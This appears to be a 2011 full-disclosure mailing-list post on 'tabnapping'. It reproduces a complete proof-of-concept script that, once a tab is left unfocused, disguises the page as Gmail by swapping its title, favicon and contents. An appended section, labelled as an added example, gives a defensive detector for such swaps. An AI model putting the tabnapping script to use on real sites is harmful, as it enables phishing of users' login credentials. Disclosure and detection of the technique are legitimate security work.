Message-ID: <BANLkTikO2Bjq-8jfGWTOcu+vfOjCABXw2w@mail.gmail.com>
Date: Wed, 8 Jun 2011 20:12:42 -0700
From: t0hitsugu <tohitsugu@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: tabnapping

I just stumbled across this (credit goes to
http://www.pjlantz.com/2010/05/tabnapping.html and Aza Raskin) and while
rough, it certainly has potential given the right circumstances.

I added a quick PoC, though I'm on a NAT and can't provide you a working
link atm, though it seemed to work fine using the latest Fennec beta. That
being said, it also worked on my box using a variety of user agents, so I'm
not certain this is even a mobile-specific problem.

The malicious script is as follows:

>
> /*
> Copyright (c) 2010 Aza Raskin
> http://azarask.in
>
> Permission is hereby granted, free of charge, to any person
> obtaining a copy of this software and associated documentation
> files (the "Software"), to deal in the Software without
> restriction, including without limitation the rights to use,
> copy, modify, merge, publish, distribute, sublicense, and/or sell
> copies of the Software, and to permit persons to whom the
> Software is furnished to do so, subject to the following
> conditions:
>
> The above copyright notice and this permission notice shall be
> included in all copies or substantial portions of the Software.
> */
>
>
> (function(){
>
> var TIMER = null;
> var HAS_SWITCHED = false;
>
> // Events
> window.onblur = function(){
>   TIMER = setTimeout(changeItUp, 5000);
> }
>
> window.onfocus = function(){
>   if(TIMER) clearTimeout(TIMER);
> }
>
> // Utils
> function setTitle(text){ document.title = text; }
>
> // This favicon object rewritten from:
> // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
> // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.
>
> favicon = {
>   docHead: document.getElementsByTagName("head")[0],
>   set: function(url){
>     this.addLink(url);
>   },
>
>   addLink: function(iconURL) {
>     var link = document.createElement("link");
>     link.type = "image/x-icon";
>     link.rel = "shortcut icon";
>     link.href = iconURL;
>     this.removeLinkIfExists();
>     this.docHead.appendChild(link);
>   },
>
>   removeLinkIfExists: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         this.docHead.removeChild(link);
>         return; // Assuming only one match at most.
>       }
>     }
>   },
>
>   get: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         return link.href;
>       }
>     }
>   }
> };
>
>
> function createShield(){
>   div = document.createElement("div");
>   div.style.position = "fixed";
>   div.style.top = 0;
>   div.style.left = 0;
>   div.style.backgroundColor = "white";
>   div.style.width = "100%";
>   div.style.height = "100%";
>   div.style.textAlign = "center";
>   document.body.style.overflow = "hidden";
>
>   img = document.createElement("img");
>   img.style.paddingTop = "15px";
>   img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";
>
>   var oldTitle = document.title;
>   var oldFavicon = favicon.get() || "/favicon.ico";
>
>   div.appendChild(img);
>   document.body.appendChild(div);
>   img.onclick = function(){
>     div.parentNode.removeChild(div);
>     document.body.style.overflow = "auto";
>     setTitle(oldTitle);
>     favicon.set(oldFavicon)
>   }
>
>
> }
>
> function changeItUp(){
>   if( HAS_SWITCHED == false ){
>     createShield("https://mail.google.com");
>     setTitle( "Gmail: Email from Google");
>     favicon.set("https://mail.google.com/favicon.ico");
>     HAS_SWITCHED = true;
>   }
> }
>
>
> })();


View attachment "tabnab.html" of type "text/html" (20086 bytes)
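
A detection-side counterpart to the script quoted above, added here as an example and not part of the original post or of Aza Raskin's code: it flags a page whose title and favicon change while its tab is unfocused. The trace format, the `findTabnapping` name and the `blog.example.test` origin are assumptions made for the illustration.

```javascript
// Added example. Trace format, names and the example.test origin are assumptions.
function findTabnapping(events, pageOrigin) {
  const findings = [];
  let pending = null; // changes seen since the tab lost focus; null while focused
  for (const ev of events) {
    if (ev.type === "blur") {
      pending = { blurredAt: ev.t, title: null, favicon: null };
    } else if (ev.type === "focus") {
      if (pending && (pending.title !== null || pending.favicon !== null)) {
        const foreignIcon = pending.favicon !== null &&
          new URL(pending.favicon, pageOrigin).origin !== new URL(pageOrigin).origin;
        // A lone title change is common (unread counters). A title plus icon
        // swap, or an icon loaded from another origin, matches the script above.
        const both = pending.title !== null && pending.favicon !== null;
        findings.push({ ...pending, foreignIcon, severity: both || foreignIcon ? "high" : "low" });
      }
      pending = null;
    } else if (pending && (ev.type === "title" || ev.type === "favicon")) {
      pending[ev.type] = ev.value; // keep the last value set while unfocused
    }
  }
  return findings;
}

// Browser wiring for a content script; skipped where there is no DOM.
if (typeof document !== "undefined") {
  const iconHref = () => (document.querySelector('link[rel~="icon"]') || {}).href || "";
  const trace = [];
  const last = { title: document.title, favicon: iconHref() };
  const log = (type, value) => trace.push({ t: Date.now(), type, value });
  const diff = (type, value) => {
    if (value !== last[type]) { last[type] = value; log(type, value); }
  };
  window.addEventListener("blur", () => log("blur"));
  window.addEventListener("focus", () => {
    log("focus");
    const hits = findTabnapping(trace.splice(0), location.origin);
    if (hits.length) console.warn("Page identity changed while unfocused:", hits);
  });
  new MutationObserver(() => { diff("title", document.title); diff("favicon", iconHref()); })
    .observe(document.head, { childList: true, subtree: true, characterData: true });
}

// Constructed trace: a benign unread counter, then the 5-second swap from the post.
const SAMPLE_TRACE = [
  { t: 0, type: "blur" }, { t: 900, type: "title", value: "(1) Inbox" }, { t: 2000, type: "focus" },
  { t: 3000, type: "blur" }, { t: 8000, type: "title", value: "Gmail: Email from Google" },
  { t: 8000, type: "favicon", value: "https://mail.google.com/favicon.ico" },
  { t: 9000, type: "focus" },
];
```

Run over `SAMPLE_TRACE` with origin `https://blog.example.test`, the first unfocused interval is rated low and the second, which swaps both title and icon to another origin, is rated high.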
